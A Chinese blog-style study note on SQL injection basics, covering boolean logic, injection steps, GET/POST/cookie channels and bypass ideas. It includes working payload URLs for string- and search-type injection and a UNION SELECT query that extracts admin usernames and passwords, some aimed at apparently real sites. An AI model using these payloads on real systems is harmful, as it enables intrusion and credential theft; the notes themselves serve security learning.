【安全牛学习笔记】初识sql注入漏洞原理
来源:互联网 发布:子弹算法 编辑:程序博客网 时间:2024/06/08 12:46
网站没有对输入的字符进行过滤,导致输入的字符影响到网站数据的查询。
编程 数学逻辑思维 and or xor 且 或 否
或:有一个真就是真
且:有一个假就为假
否:相反
怎么找是否有注入漏洞?
第一个找符合参数链接的网站
第二个判断是否存在注入
第三个实施注入攻击
分析sql注入流程:
第一步 猜解表名
第二步 猜解列名
第三步 猜解内容
三大web提交方式:GET POST COOKIE
get:直接在浏览器上面访问地址
post:按钮事件(会员注册,文件上传等)
cookie:访问网站下面自带的身份验证的值
普通的注入没办法了,可以尝试大小写,编码等绕过
各大参数类型详解:字符型,数字型,搜索型
字符型:abcd。。。。。26个英文字母 中文
数字型:0-9
搜索型:搜索关键字
编程中对于字符型的数据是什么表示的?
0123456789 "a" 'b' a 变量 常量
各大类型下的注入:前面我们的注入基本都是数字型,前面注入语句都是基于数字型注入
字符型注入:
http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包
http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='1 返回正常。
http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='2 返回错误。
搜索型注入:
http://www.myhack58.com/product/list_search.aspx?search=Donic
http://www.myhack58.com/product/list_search.aspx?search=Donic%'and user>0 and '%'=' //得到当前数据库账号
http://www.myhack58.com/product/list_search.aspx?search=Donic%'and db_name()>0 and '%'=' //得到当前数据库名
http://www.myhack58.com/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'=' //返回错误页面,看来是没有admin这个表了
代码审计:南方数据0day 分析
http://www.xxx.com/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='
http://www.chinafxhb.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
select * from News where BigClassName='"& BigClass &"' and SmallClassName='"‘union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 "' order by AddDate desc
- 【安全牛学习笔记】初识sql注入漏洞原理
- 【安全牛学习笔记】初识sql注入漏洞原理
- 【安全牛学习笔记】初识sql注入漏洞原理
- 【安全牛学习笔记】基于PHP的SQL注入漏洞原理及解决办法
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入
- 【安全牛学习笔记】KALI版本更新和手动漏洞挖掘(SQL注入)
- sql注入漏洞原理
- 【安全牛学习笔记】KALI版本更新(第一个ROLLING RELEASE)和手动漏洞挖掘(SQL注入)
- 【安全牛学习笔记】KALI版本更新(第一个ROLLING RELEASE)和手动漏洞挖掘(SQL注入)
- java安全-SQL注入漏洞
- 【安全牛学习笔记】手动漏洞挖掘-SQL盲注
- 【安全牛学习笔记】手动漏洞挖掘-SQL盲注
- sql注入攻击学习笔记之初识sql注入
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入XSS-简介、跨站脚本检测和常见的攻击利用手段
- web安全 XSS、CSRF 漏洞、SQL 注入漏洞,跳转漏洞
- python 按照字典的值进行排序
- 国内暂时可用的API集合
- 思科路由模拟器 -- (3)RIP协议及配置
- KMS激活脚本生成程序(自用备份)
- 选太子问题
- 【安全牛学习笔记】初识sql注入漏洞原理
- Spring中AOP的JDKProxy和CGlibProxy的区别
- MySQL 常用指令小结
- testng与maven结合-通过maven可以编译testng
- 距离算法(更新中)
- java初入多线程9
- Numpy库学习——向量表示
- Stm32cubeMX生成配置工程的例子和过程记录
- 随记接口跟抽象类